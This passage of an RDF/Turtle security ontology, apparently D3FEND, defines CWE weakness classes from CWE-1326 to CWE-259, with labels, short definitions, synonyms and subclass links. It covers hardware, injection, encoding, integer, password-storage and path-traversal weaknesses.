d3f:CWE-770 . d3f:CWE-1326 a owl:Class ; rdfs:label "Missing Immutable Root of Trust in Hardware" ; d3f:cwe-id "CWE-1326" ; d3f:definition "A missing immutable root of trust in the hardware results in the ability to bypass secure boot or execute untrusted or adversarial boot code." ; rdfs:subClassOf d3f:CWE-693 . d3f:CWE-1327 a owl:Class ; rdfs:label "Binding to an Unrestricted IP Address" ; d3f:cwe-id "CWE-1327" ; d3f:definition "The product assigns the address 0.0.0.0 for a database server, a cloud service/instance, or any computing resource that communicates remotely." ; rdfs:subClassOf d3f:CWE-668 . d3f:CWE-1328 a owl:Class ; rdfs:label "Security Version Number Mutable to Older Versions" ; d3f:cwe-id "CWE-1328" ; d3f:definition "Security-version number in hardware is mutable, resulting in the ability to downgrade (roll-back) the boot firmware to vulnerable code versions." ; rdfs:subClassOf d3f:CWE-285 . d3f:CWE-1330 a owl:Class ; rdfs:label "Remanent Data Readable after Memory Erase" ; d3f:cwe-id "CWE-1330" ; d3f:definition "Confidential information stored in memory circuits is readable or recoverable after being cleared or erased." ; rdfs:subClassOf d3f:CWE-1301 . d3f:CWE-1331 a owl:Class ; rdfs:label "Improper Isolation of Shared Resources in Network On Chip (NoC)" ; d3f:cwe-id "CWE-1331" ; d3f:definition "The Network On Chip (NoC) does not isolate or incorrectly isolates its on-chip-fabric and internal resources such that they are shared between trusted and untrusted agents, creating timing channels." ; rdfs:subClassOf d3f:CWE-653, d3f:CWE-668 . d3f:CWE-1332 a owl:Class ; rdfs:label "Improper Handling of Faults that Lead to Instruction Skips" ; d3f:cwe-id "CWE-1332" ; d3f:definition "The device is missing or incorrectly implements circuitry or sensors that detect and mitigate the skipping of security-critical CPU instructions when they occur." ; rdfs:subClassOf d3f:CWE-1384 . d3f:CWE-1333 a owl:Class ; rdfs:label "Inefficient Regular Expression Complexity" ; d3f:cwe-id "CWE-1333" ; d3f:definition "The product uses a regular expression with an inefficient, possibly exponential worst-case computational complexity that consumes excessive CPU cycles." ; d3f:synonym "Catastrophic backtracking", "ReDoS", "Regular Expression Denial of Service" ; rdfs:subClassOf d3f:CWE-407 . d3f:CWE-1334 a owl:Class ; rdfs:label "Unauthorized Error Injection Can Degrade Hardware Redundancy" ; d3f:cwe-id "CWE-1334" ; d3f:definition "An unauthorized agent can inject errors into a redundant block to deprive the system of redundancy or put the system in a degraded operating mode." ; rdfs:subClassOf d3f:CWE-284 . d3f:CWE-1335 a owl:Class ; rdfs:label "Incorrect Bitwise Shift of Integer" ; d3f:cwe-id "CWE-1335" ; d3f:definition "An integer value is specified to be shifted by a negative amount or an amount greater than or equal to the number of bits contained in the value causing an unexpected or indeterminate result." ; rdfs:subClassOf d3f:CWE-682 . d3f:CWE-1336 a owl:Class ; rdfs:label "Improper Neutralization of Special Elements Used in a Template Engine" ; d3f:cwe-id "CWE-1336" ; d3f:definition "The product uses a template engine to insert or process externally-influenced input, but it does not neutralize or incorrectly neutralizes special elements or syntax that can be interpreted as template expressions or other code directives when processed by the engine." ; d3f:synonym "Client-Side Template Injection / CSTI", "Server-Side Template Injection / SSTI" ; rdfs:subClassOf d3f:CWE-94 . d3f:CWE-1338 a owl:Class ; rdfs:label "Improper Protections Against Hardware Overheating" ; d3f:cwe-id "CWE-1338" ; d3f:definition "A hardware device is missing or has inadequate protection features to prevent overheating." ; rdfs:subClassOf d3f:CWE-693 . d3f:CWE-1339 a owl:Class ; rdfs:label "Insufficient Precision or Accuracy of a Real Number" ; d3f:cwe-id "CWE-1339" ; d3f:definition "The product processes a real number with an implementation in which the number's representation does not preserve required accuracy and precision in its fractional part, causing an incorrect result." ; rdfs:subClassOf d3f:CWE-682 . d3f:CWE-134 a owl:Class ; rdfs:label "Use of Externally-Controlled Format String" ; d3f:cwe-id "CWE-134" ; d3f:definition "The product uses a function that accepts a format string as an argument, but the format string originates from an external source." ; rdfs:subClassOf d3f:CWE-668 . d3f:CWE-1342 a owl:Class ; rdfs:label "Information Exposure through Microarchitectural State after Transient Execution" ; d3f:cwe-id "CWE-1342" ; d3f:definition "The processor does not properly clear microarchitectural state after incorrect microcode assists or speculative execution, resulting in transient execution." ; rdfs:subClassOf d3f:CWE-226 . d3f:CWE-135 a owl:Class ; rdfs:label "Incorrect Calculation of Multi-Byte String Length" ; d3f:cwe-id "CWE-135" ; d3f:definition "The product does not correctly calculate the length of strings that can contain wide or multi-byte characters." ; rdfs:subClassOf d3f:CWE-682 . d3f:CWE-1351 a owl:Class ; rdfs:label "Improper Handling of Hardware Behavior in Exceptionally Cold Environments" ; d3f:cwe-id "CWE-1351" ; d3f:definition "A hardware device, or the firmware running on it, is missing or has incorrect protection features to maintain goals of security primitives when the device is cooled below standard operating temperatures." ; rdfs:subClassOf d3f:CWE-1384 . d3f:CWE-1385 a owl:Class ; rdfs:label "Missing Origin Validation in WebSockets" ; d3f:cwe-id "CWE-1385" ; d3f:definition "The product uses a WebSocket, but it does not properly verify that the source of data or communication is valid." ; d3f:synonym "Cross-Site WebSocket hijacking (CSWSH)" ; rdfs:subClassOf d3f:CWE-346 . d3f:CWE-1386 a owl:Class ; rdfs:label "Insecure Operation on Windows Junction / Mount Point" ; d3f:cwe-id "CWE-1386" ; d3f:definition "The product opens a file or directory, but it does not properly prevent the name from being associated with a junction or mount point to a destination that is outside of the intended control sphere." ; rdfs:subClassOf d3f:CWE-59 . d3f:CWE-1389 a owl:Class ; rdfs:label "Incorrect Parsing of Numbers with Different Radices" ; d3f:cwe-id "CWE-1389" ; d3f:definition "The product parses numeric input assuming base 10 (decimal) values, but it does not account for inputs that use a different base number (radix)." ; rdfs:subClassOf d3f:CWE-704 . d3f:CWE-1393 a owl:Class, owl:NamedIndividual ; rdfs:label "Use of Default Password" ; d3f:cwe-id "CWE-1393" ; d3f:definition "The product uses default passwords for potentially critical functionality." ; d3f:weakness-of d3f:UserAccount ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:weakness-of ; owl:someValuesFrom d3f:UserAccount ], d3f:CWE-1392 . d3f:CWE-1394 a owl:Class ; rdfs:label "Use of Default Cryptographic Key" ; d3f:cwe-id "CWE-1394" ; d3f:definition "The product uses a default cryptographic key for potentially critical functionality." ; rdfs:subClassOf d3f:CWE-1392 . d3f:CWE-1395 a owl:Class ; rdfs:label "Dependency on Vulnerable Third-Party Component" ; d3f:cwe-id "CWE-1395" ; d3f:definition "The product has a dependency on a third-party component that contains one or more known vulnerabilities." ; rdfs:subClassOf d3f:CWE-657 . d3f:CWE-14 a owl:Class ; rdfs:label "Compiler Removal of Code to Clear Buffers" ; d3f:cwe-id "CWE-14" ; d3f:definition "Sensitive memory is cleared according to the source code, but compiler optimizations leave the memory untouched when it is not read from again, aka \"dead store removal.\"" ; rdfs:subClassOf d3f:CWE-733 . d3f:CWE-141 a owl:Class ; rdfs:label "Improper Neutralization of Parameter/Argument Delimiters" ; d3f:cwe-id "CWE-141" ; d3f:definition "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as parameter or argument delimiters when they are sent to a downstream component." ; rdfs:subClassOf d3f:CWE-140 . d3f:CWE-142 a owl:Class ; rdfs:label "Improper Neutralization of Value Delimiters" ; d3f:cwe-id "CWE-142" ; d3f:definition "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as value delimiters when they are sent to a downstream component." ; rdfs:subClassOf d3f:CWE-140 . d3f:CWE-1421 a owl:Class ; rdfs:label "Exposure of Sensitive Information in Shared Microarchitectural Structures during Transient Execution" ; d3f:cwe-id "CWE-1421" ; d3f:definition "A processor event may allow transient operations to access architecturally restricted data (for example, in another address space) in a shared microarchitectural structure (for example, a CPU cache), potentially exposing the data over a covert channel." ; rdfs:subClassOf d3f:CWE-1420 . d3f:CWE-1422 a owl:Class ; rdfs:label "Exposure of Sensitive Information caused by Incorrect Data Forwarding during Transient Execution" ; d3f:cwe-id "CWE-1422" ; d3f:definition "A processor event or prediction may allow incorrect or stale data to be forwarded to transient operations, potentially exposing data over a covert channel." ; rdfs:subClassOf d3f:CWE-1420 . d3f:CWE-1423 a owl:Class ; rdfs:label "Exposure of Sensitive Information caused by Shared Microarchitectural Predictor State that Influences Transient Execution" ; d3f:cwe-id "CWE-1423" ; d3f:definition "Shared microarchitectural predictor state may allow code to influence transient execution across a hardware boundary, potentially exposing data that is accessible beyond the boundary over a covert channel." ; rdfs:subClassOf d3f:CWE-1420 . d3f:CWE-1426 a owl:Class ; rdfs:label "Improper Validation of Generative AI Output" ; d3f:cwe-id "CWE-1426" ; d3f:definition "The product invokes a generative AI/ML component whose behaviors and outputs cannot be directly controlled, but the product does not validate or insufficiently validates the outputs to ensure that they align with the intended security, content, or privacy policy." ; rdfs:subClassOf d3f:CWE-707 . d3f:CWE-1427 a owl:Class ; rdfs:label "Improper Neutralization of Input Used for LLM Prompting" ; d3f:cwe-id "CWE-1427" ; d3f:definition "The product uses externally-provided data to build prompts provided to large language models (LLMs), but the way these prompts are constructed causes the LLM to fail to distinguish between user-supplied inputs and developer provided system directives." ; d3f:synonym "prompt injection" ; rdfs:subClassOf d3f:CWE-77 . d3f:CWE-1428 a owl:Class ; rdfs:label "Reliance on HTTP instead of HTTPS" ; d3f:cwe-id "CWE-1428" ; d3f:definition "The product provides or relies on use of HTTP communications when HTTPS is available." ; rdfs:subClassOf d3f:CWE-319 . d3f:CWE-1429 a owl:Class ; rdfs:label "Missing Security-Relevant Feedback for Unexecuted Operations in Hardware Interface" ; d3f:cwe-id "CWE-1429" ; d3f:definition "The product has a hardware interface that silently discards operations in situations for which feedback would be security-relevant, such as the timely detection of failures or attacks." ; rdfs:subClassOf d3f:CWE-223 . d3f:CWE-143 a owl:Class ; rdfs:label "Improper Neutralization of Record Delimiters" ; d3f:cwe-id "CWE-143" ; d3f:definition "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as record delimiters when they are sent to a downstream component." ; rdfs:subClassOf d3f:CWE-140 . d3f:CWE-1431 a owl:Class ; rdfs:label "Driving Intermediate Cryptographic State/Results to Hardware Module Outputs" ; d3f:cwe-id "CWE-1431" ; d3f:definition "The product uses a hardware module implementing a cryptographic algorithm that writes sensitive information about the intermediate state or results of its cryptographic operations via one of its output wires (typically the output port containing the final result)." ; rdfs:subClassOf d3f:CWE-200 . d3f:CWE-144 a owl:Class ; rdfs:label "Improper Neutralization of Line Delimiters" ; d3f:cwe-id "CWE-144" ; d3f:definition "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as line delimiters when they are sent to a downstream component." ; rdfs:subClassOf d3f:CWE-140 . d3f:CWE-145 a owl:Class ; rdfs:label "Improper Neutralization of Section Delimiters" ; d3f:cwe-id "CWE-145" ; d3f:definition "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as section delimiters when they are sent to a downstream component." ; rdfs:subClassOf d3f:CWE-140 . d3f:CWE-146 a owl:Class ; rdfs:label "Improper Neutralization of Expression/Command Delimiters" ; d3f:cwe-id "CWE-146" ; d3f:definition "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as expression or command delimiters when they are sent to a downstream component." ; rdfs:subClassOf d3f:CWE-140 . d3f:CWE-148 a owl:Class ; rdfs:label "Improper Neutralization of Input Leaders" ; d3f:cwe-id "CWE-148" ; d3f:definition "The product does not properly handle when a leading character or sequence (\"leader\") is missing or malformed, or if multiple leaders are used when only one should be allowed." ; rdfs:subClassOf d3f:CWE-138 . d3f:CWE-149 a owl:Class ; rdfs:label "Improper Neutralization of Quoting Syntax" ; d3f:cwe-id "CWE-149" ; d3f:definition "Quotes injected into a product can be used to compromise a system. As data are parsed, an injected/absent/duplicate/malformed use of quotes may cause the process to take unexpected actions." ; rdfs:subClassOf d3f:CWE-138 . d3f:CWE-15 a owl:Class ; rdfs:label "External Control of System or Configuration Setting" ; d3f:cwe-id "CWE-15" ; d3f:definition "One or more system settings or configuration elements can be externally controlled by a user." ; rdfs:subClassOf d3f:CWE-610, d3f:CWE-642 . d3f:CWE-150 a owl:Class ; rdfs:label "Improper Neutralization of Escape, Meta, or Control Sequences" ; d3f:cwe-id "CWE-150" ; d3f:definition "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as escape, meta, or control character sequences when they are sent to a downstream component." ; rdfs:subClassOf d3f:CWE-138 . d3f:CWE-151 a owl:Class ; rdfs:label "Improper Neutralization of Comment Delimiters" ; d3f:cwe-id "CWE-151" ; d3f:definition "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as comment delimiters when they are sent to a downstream component." ; rdfs:subClassOf d3f:CWE-138 . d3f:CWE-152 a owl:Class ; rdfs:label "Improper Neutralization of Macro Symbols" ; d3f:cwe-id "CWE-152" ; d3f:definition "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as macro symbols when they are sent to a downstream component." ; rdfs:subClassOf d3f:CWE-138 . d3f:CWE-153 a owl:Class ; rdfs:label "Improper Neutralization of Substitution Characters" ; d3f:cwe-id "CWE-153" ; d3f:definition "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as substitution characters when they are sent to a downstream component." ; rdfs:subClassOf d3f:CWE-138 . d3f:CWE-154 a owl:Class ; rdfs:label "Improper Neutralization of Variable Name Delimiters" ; d3f:cwe-id "CWE-154" ; d3f:definition "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as variable name delimiters when they are sent to a downstream component." ; rdfs:subClassOf d3f:CWE-138 . d3f:CWE-156 a owl:Class ; rdfs:label "Improper Neutralization of Whitespace" ; d3f:cwe-id "CWE-156" ; d3f:definition "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as whitespace when they are sent to a downstream component." ; d3f:synonym "White space" ; rdfs:subClassOf d3f:CWE-138 . d3f:CWE-157 a owl:Class ; rdfs:label "Failure to Sanitize Paired Delimiters" ; d3f:cwe-id "CWE-157" ; d3f:definition "The product does not properly handle the characters that are used to mark the beginning and ending of a group of entities, such as parentheses, brackets, and braces." ; rdfs:subClassOf d3f:CWE-138 . d3f:CWE-158 a owl:Class ; rdfs:label "Improper Neutralization of Null Byte or NUL Character" ; d3f:cwe-id "CWE-158" ; d3f:definition "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes NUL characters or null bytes when they are sent to a downstream component." ; rdfs:subClassOf d3f:CWE-138 . d3f:CWE-166 a owl:Class ; rdfs:label "Improper Handling of Missing Special Element" ; d3f:cwe-id "CWE-166" ; d3f:definition "The product receives input from an upstream component, but it does not handle or incorrectly handles when an expected special element is missing." ; rdfs:subClassOf d3f:CWE-159, d3f:CWE-228, d3f:CWE-703 . d3f:CWE-167 a owl:Class ; rdfs:label "Improper Handling of Additional Special Element" ; d3f:cwe-id "CWE-167" ; d3f:definition "The product receives input from an upstream component, but it does not handle or incorrectly handles when an additional unexpected special element is provided." ; rdfs:subClassOf d3f:CWE-159, d3f:CWE-228, d3f:CWE-703 . d3f:CWE-168 a owl:Class ; rdfs:label "Improper Handling of Inconsistent Special Elements" ; d3f:cwe-id "CWE-168" ; d3f:definition "The product does not properly handle input in which an inconsistency exists between two or more special characters or reserved words." ; rdfs:subClassOf d3f:CWE-159, d3f:CWE-228, d3f:CWE-703 . d3f:CWE-170 a owl:Class ; rdfs:label "Improper Null Termination" ; d3f:cwe-id "CWE-170" ; d3f:definition "The product does not terminate or incorrectly terminates a string or array with a null character or equivalent terminator." ; rdfs:subClassOf d3f:CWE-707 . d3f:CWE-173 a owl:Class ; rdfs:label "Improper Handling of Alternate Encoding" ; d3f:cwe-id "CWE-173" ; d3f:definition "The product does not properly handle when an input uses an alternate encoding that is valid for the control sphere to which the input is being sent." ; rdfs:subClassOf d3f:CWE-172 . d3f:CWE-174 a owl:Class ; rdfs:label "Double Decoding of the Same Data" ; d3f:cwe-id "CWE-174" ; d3f:definition "The product decodes the same input twice, which can limit the effectiveness of any protection mechanism that occurs in between the decoding operations." ; rdfs:subClassOf d3f:CWE-172, d3f:CWE-675 . d3f:CWE-175 a owl:Class ; rdfs:label "Improper Handling of Mixed Encoding" ; d3f:cwe-id "CWE-175" ; d3f:definition "The product does not properly handle when the same input uses several different (mixed) encodings." ; rdfs:subClassOf d3f:CWE-172 . d3f:CWE-176 a owl:Class ; rdfs:label "Improper Handling of Unicode Encoding" ; d3f:cwe-id "CWE-176" ; d3f:definition "The product does not properly handle when an input contains Unicode encoding." ; rdfs:subClassOf d3f:CWE-172 . d3f:CWE-177 a owl:Class ; rdfs:label "Improper Handling of URL Encoding (Hex Encoding)" ; d3f:cwe-id "CWE-177" ; d3f:definition "The product does not properly handle when all or part of an input has been URL encoded." ; rdfs:subClassOf d3f:CWE-172 . d3f:CWE-178 a owl:Class ; rdfs:label "Improper Handling of Case Sensitivity" ; d3f:cwe-id "CWE-178" ; d3f:definition "The product does not properly account for differences in case sensitivity when accessing or determining the properties of a resource, leading to inconsistent results." ; rdfs:subClassOf d3f:CWE-706 . d3f:CWE-180 a owl:Class ; rdfs:label "Incorrect Behavior Order: Validate Before Canonicalize" ; d3f:cwe-id "CWE-180" ; d3f:definition "The product validates input before it is canonicalized, which prevents the product from detecting data that becomes invalid after the canonicalization step." ; rdfs:subClassOf d3f:CWE-179 . d3f:CWE-181 a owl:Class ; rdfs:label "Incorrect Behavior Order: Validate Before Filter" ; d3f:cwe-id "CWE-181" ; d3f:definition "The product validates data before it has been filtered, which prevents the product from detecting data that becomes invalid after the filtering step." ; d3f:synonym "Validate-before-cleanse" ; rdfs:subClassOf d3f:CWE-179 . d3f:CWE-182 a owl:Class ; rdfs:label "Collapse of Data into Unsafe Value" ; d3f:cwe-id "CWE-182" ; d3f:definition "The product filters data in a way that causes it to be reduced or \"collapsed\" into an unsafe value that violates an expected security property." ; rdfs:subClassOf d3f:CWE-693, d3f:CWE-707 . d3f:CWE-186 a owl:Class ; rdfs:label "Overly Restrictive Regular Expression" ; d3f:cwe-id "CWE-186" ; d3f:definition "A regular expression is overly restrictive, which prevents dangerous values from being detected." ; rdfs:subClassOf d3f:CWE-185 . d3f:CWE-187 a owl:Class ; rdfs:label "Partial String Comparison" ; d3f:cwe-id "CWE-187" ; d3f:definition "The product performs a comparison that only examines a portion of a factor before determining whether there is a match, such as a substring, leading to resultant weaknesses." ; rdfs:subClassOf d3f:CWE-1023 . d3f:CWE-191 a owl:Class ; rdfs:label "Integer Underflow (Wrap or Wraparound)" ; d3f:cwe-id "CWE-191" ; d3f:definition "The product subtracts one value from another, such that the result is less than the minimum allowable integer value, which produces a value that is not equal to the correct result." ; d3f:synonym "Integer underflow" ; rdfs:subClassOf d3f:CWE-682 . d3f:CWE-192 a owl:Class ; rdfs:label "Integer Coercion Error" ; d3f:cwe-id "CWE-192" ; d3f:definition "Integer coercion refers to a set of flaws pertaining to the type casting, extension, or truncation of primitive data types." ; rdfs:subClassOf d3f:CWE-681 . d3f:CWE-193 a owl:Class ; rdfs:label "Off-by-one Error" ; d3f:cwe-id "CWE-193" ; d3f:definition "A product calculates or uses an incorrect maximum or minimum value that is 1 more, or 1 less, than the correct value." ; d3f:synonym "off-by-five" ; rdfs:subClassOf d3f:CWE-682 . d3f:CWE-194 a owl:Class ; rdfs:label "Unexpected Sign Extension" ; d3f:cwe-id "CWE-194" ; d3f:definition "The product performs an operation on a number that causes it to be sign extended when it is transformed into a larger data type. When the original number is negative, this can produce unexpected values that lead to resultant weaknesses." ; rdfs:subClassOf d3f:CWE-681 . d3f:CWE-195 a owl:Class ; rdfs:label "Signed to Unsigned Conversion Error" ; d3f:cwe-id "CWE-195" ; d3f:definition "The product uses a signed primitive and performs a cast to an unsigned primitive, which can produce an unexpected value if the value of the signed primitive can not be represented using an unsigned primitive." ; rdfs:subClassOf d3f:CWE-681 . d3f:CWE-196 a owl:Class ; rdfs:label "Unsigned to Signed Conversion Error" ; d3f:cwe-id "CWE-196" ; d3f:definition "The product uses an unsigned primitive and performs a cast to a signed primitive, which can produce an unexpected value if the value of the unsigned primitive can not be represented using a signed primitive." ; rdfs:subClassOf d3f:CWE-681 . d3f:CWE-197 a owl:Class ; rdfs:label "Numeric Truncation Error" ; d3f:cwe-id "CWE-197" ; d3f:definition "Truncation errors occur when a primitive is cast to a primitive of a smaller size and data is lost in the conversion." ; rdfs:subClassOf d3f:CWE-681 . d3f:CWE-198 a owl:Class ; rdfs:label "Use of Incorrect Byte Ordering" ; d3f:cwe-id "CWE-198" ; d3f:definition "The product receives input from an upstream component, but it does not account for byte ordering (e.g. big-endian and little-endian) when processing the input, causing an incorrect number or value to be used." ; rdfs:subClassOf d3f:CWE-188 . d3f:CWE-202 a owl:Class ; rdfs:label "Exposure of Sensitive Information Through Data Queries" ; d3f:cwe-id "CWE-202" ; d3f:definition "When trying to keep information confidential, an attacker can often infer some of the information by using statistics." ; rdfs:subClassOf d3f:CWE-1230 . d3f:CWE-204 a owl:Class ; rdfs:label "Observable Response Discrepancy" ; d3f:cwe-id "CWE-204" ; d3f:definition "The product provides different responses to incoming requests in a way that reveals internal state information to an unauthorized actor outside of the intended control sphere." ; rdfs:subClassOf d3f:CWE-203 . d3f:CWE-206 a owl:Class ; rdfs:label "Observable Internal Behavioral Discrepancy" ; d3f:cwe-id "CWE-206" ; d3f:definition "The product performs multiple behaviors that are combined to produce a single result, but the individual behaviors are observable separately in a way that allows attackers to reveal internal state or internal decision points." ; rdfs:subClassOf d3f:CWE-205 . d3f:CWE-207 a owl:Class ; rdfs:label "Observable Behavioral Discrepancy With Equivalent Products" ; d3f:cwe-id "CWE-207" ; d3f:definition "The product operates in an environment in which its existence or specific identity should not be known, but it behaves differently than other products with equivalent functionality, in a way that is observable to an attacker." ; rdfs:subClassOf d3f:CWE-205 . d3f:CWE-210 a owl:Class ; rdfs:label "Self-generated Error Message Containing Sensitive Information" ; d3f:cwe-id "CWE-210" ; d3f:definition "The product identifies an error condition and creates its own diagnostic or error messages that contain sensitive information." ; rdfs:subClassOf d3f:CWE-209 . d3f:CWE-213 a owl:Class ; rdfs:label "Exposure of Sensitive Information Due to Incompatible Policies" ; d3f:cwe-id "CWE-213" ; d3f:definition "The product's intended functionality exposes information to certain actors in accordance with the developer's security policy, but this information is regarded as sensitive according to the intended security policies of other stakeholders such as the product's administrator, users, or others whose information is being processed." ; rdfs:subClassOf d3f:CWE-200 . d3f:CWE-214 a owl:Class ; rdfs:label "Invocation of Process Using Visible Sensitive Information" ; d3f:cwe-id "CWE-214" ; d3f:definition "A process is invoked with sensitive command-line arguments, environment variables, or other elements that can be seen by other processes on the operating system." ; rdfs:subClassOf d3f:CWE-497 . d3f:CWE-215 a owl:Class ; rdfs:label "Insertion of Sensitive Information Into Debugging Code" ; d3f:cwe-id "CWE-215" ; d3f:definition "The product inserts sensitive information into debugging code, which could expose this information if the debugging code is not disabled in production." ; rdfs:subClassOf d3f:CWE-200 . d3f:CWE-220 a owl:Class ; rdfs:label "Storage of File With Sensitive Data Under FTP Root" ; d3f:cwe-id "CWE-220" ; d3f:definition "The product stores sensitive data under the FTP server root with insufficient access control, which might make it accessible to untrusted parties." ; rdfs:subClassOf d3f:CWE-552 . d3f:CWE-222 a owl:Class ; rdfs:label "Truncation of Security-relevant Information" ; d3f:cwe-id "CWE-222" ; d3f:definition "The product truncates the display, recording, or processing of security-relevant information in a way that can obscure the source or nature of an attack." ; rdfs:subClassOf d3f:CWE-221 . d3f:CWE-224 a owl:Class ; rdfs:label "Obscured Security-relevant Information by Alternate Name" ; d3f:cwe-id "CWE-224" ; d3f:definition "The product records security-relevant information according to an alternate name of the affected entity, instead of the canonical name." ; rdfs:subClassOf d3f:CWE-221 . d3f:CWE-230 a owl:Class ; rdfs:label "Improper Handling of Missing Values" ; d3f:cwe-id "CWE-230" ; d3f:definition "The product does not handle or incorrectly handles when a parameter, field, or argument name is specified, but the associated value is missing, i.e. it is empty, blank, or null." ; rdfs:subClassOf d3f:CWE-229 . d3f:CWE-231 a owl:Class ; rdfs:label "Improper Handling of Extra Values" ; d3f:cwe-id "CWE-231" ; d3f:definition "The product does not handle or incorrectly handles when more values are provided than expected." ; rdfs:subClassOf d3f:CWE-229 . d3f:CWE-232 a owl:Class ; rdfs:label "Improper Handling of Undefined Values" ; d3f:cwe-id "CWE-232" ; d3f:definition "The product does not handle or incorrectly handles when a value is not defined or supported for the associated parameter, field, or argument name." ; rdfs:subClassOf d3f:CWE-229 . d3f:CWE-234 a owl:Class ; rdfs:label "Failure to Handle Missing Parameter" ; d3f:cwe-id "CWE-234" ; d3f:definition "If too few arguments are sent to a function, the function will still pop the expected number of arguments from the stack. Potentially, a variable number of arguments could be exhausted in a function as well." ; rdfs:subClassOf d3f:CWE-233 . d3f:CWE-235 a owl:Class ; rdfs:label "Improper Handling of Extra Parameters" ; d3f:cwe-id "CWE-235" ; d3f:definition "The product does not handle or incorrectly handles when the number of parameters, fields, or arguments with the same name exceeds the expected amount." ; rdfs:subClassOf d3f:CWE-233 . d3f:CWE-236 a owl:Class ; rdfs:label "Improper Handling of Undefined Parameters" ; d3f:cwe-id "CWE-236" ; d3f:definition "The product does not handle or incorrectly handles when a particular parameter, field, or argument name is not defined or supported by the product." ; rdfs:subClassOf d3f:CWE-233 . d3f:CWE-238 a owl:Class ; rdfs:label "Improper Handling of Incomplete Structural Elements" ; d3f:cwe-id "CWE-238" ; d3f:definition "The product does not handle or incorrectly handles when a particular structural element is not completely specified." ; rdfs:subClassOf d3f:CWE-237 . d3f:CWE-239 a owl:Class ; rdfs:label "Failure to Handle Incomplete Element" ; d3f:cwe-id "CWE-239" ; d3f:definition "The product does not properly handle when a particular element is not completely specified." ; rdfs:subClassOf d3f:CWE-237 . d3f:CWE-24 a owl:Class ; rdfs:label "Path Traversal: '../filedir'" ; d3f:cwe-id "CWE-24" ; d3f:definition "The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \"../\" sequences that can resolve to a location that is outside of that directory." ; rdfs:subClassOf d3f:CWE-23 . d3f:CWE-241 a owl:Class ; rdfs:label "Improper Handling of Unexpected Data Type" ; d3f:cwe-id "CWE-241" ; d3f:definition "The product does not handle or incorrectly handles when a particular element is not the expected type, e.g. it expects a digit (0-9) but is provided with a letter (A-Z)." ; rdfs:subClassOf d3f:CWE-228 . d3f:CWE-242 a owl:Class ; rdfs:label "Use of Inherently Dangerous Function" ; d3f:cwe-id "CWE-242" ; d3f:definition "The product calls a function that can never be guaranteed to work safely." ; rdfs:subClassOf d3f:CWE-1177 . d3f:CWE-243 a owl:Class ; rdfs:label "Creation of chroot Jail Without Changing Working Directory" ; d3f:cwe-id "CWE-243" ; d3f:definition "The product uses the chroot() system call to create a jail, but does not change the working directory afterward. This does not prevent access to files outside of the jail." ; rdfs:subClassOf d3f:CWE-573, d3f:CWE-669 . d3f:CWE-244 a owl:Class ; rdfs:label "Improper Clearing of Heap Memory Before Release ('Heap Inspection')" ; d3f:cwe-id "CWE-244" ; d3f:definition "Using realloc() to resize buffers that store sensitive information can leave the sensitive information exposed to attack, because it is not removed from memory." ; rdfs:subClassOf d3f:CWE-226 . d3f:CWE-245 a owl:Class ; rdfs:label "J2EE Bad Practices: Direct Management of Connections" ; d3f:cwe-id "CWE-245" ; d3f:definition "The J2EE application directly manages connections, instead of using the container's connection management facilities." ; rdfs:subClassOf d3f:CWE-695 . d3f:CWE-246 a owl:Class ; rdfs:label "J2EE Bad Practices: Direct Use of Sockets" ; d3f:cwe-id "CWE-246" ; d3f:definition "The J2EE application directly uses sockets instead of using framework method calls." ; rdfs:subClassOf d3f:CWE-695 . d3f:CWE-25 a owl:Class ; rdfs:label "Path Traversal: '/../filedir'" ; d3f:cwe-id "CWE-25" ; d3f:definition "The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \"/../\" sequences that can resolve to a location that is outside of that directory." ; rdfs:subClassOf d3f:CWE-23 . d3f:CWE-250 a owl:Class ; rdfs:label "Execution with Unnecessary Privileges" ; d3f:cwe-id "CWE-250" ; d3f:definition "The product performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses." ; rdfs:subClassOf d3f:CWE-269, d3f:CWE-657 . d3f:CWE-253 a owl:Class ; rdfs:label "Incorrect Check of Function Return Value" ; d3f:cwe-id "CWE-253" ; d3f:definition "The product incorrectly checks a return value from a function, which prevents it from detecting errors or exceptional conditions." ; rdfs:subClassOf d3f:CWE-573, d3f:CWE-754 . d3f:CWE-256 a owl:Class ; rdfs:label "Plaintext Storage of a Password" ; d3f:cwe-id "CWE-256" ; d3f:definition "Storing a password in plaintext may result in a system compromise." ; rdfs:subClassOf d3f:CWE-522 . d3f:CWE-257 a owl:Class ; rdfs:label "Storing Passwords in a Recoverable Format" ; d3f:cwe-id "CWE-257" ; d3f:definition "The storage of passwords in a recoverable format makes them subject to password reuse attacks by malicious users. In fact, it should be noted that recoverable encrypted passwords provide no significant benefit over plaintext passwords since they are subject not only to reuse by malicious attackers but also by malicious insiders. If a system administrator can recover a password directly, or use a brute force search on the available information, the administrator can use the password on other accounts." ; rdfs:subClassOf d3f:CWE-522 . d3f:CWE-258 a owl:Class ; rdfs:label "Empty Password in Configuration File" ; d3f:cwe-id "CWE-258" ; d3f:definition "Using an empty string as a password is insecure." ; rdfs:subClassOf d3f:CWE-260, d3f:CWE-521 . d3f:CWE-259 a owl:Class ; rdfs:label "Use of Hard-coded Password" ; d3f:cwe-id "CWE-259" ; d3f:definition "The product contains a hard-coded password, which it uses for its own inbound authentication or for outbound communication to external components." ; rdfs:subClassOf d3f:CWE-798 . d3f:CWE-26 a owl:Class ; rdfs:label "Path Traversal: '/dir/../filename'" ; d3f:cwe-id 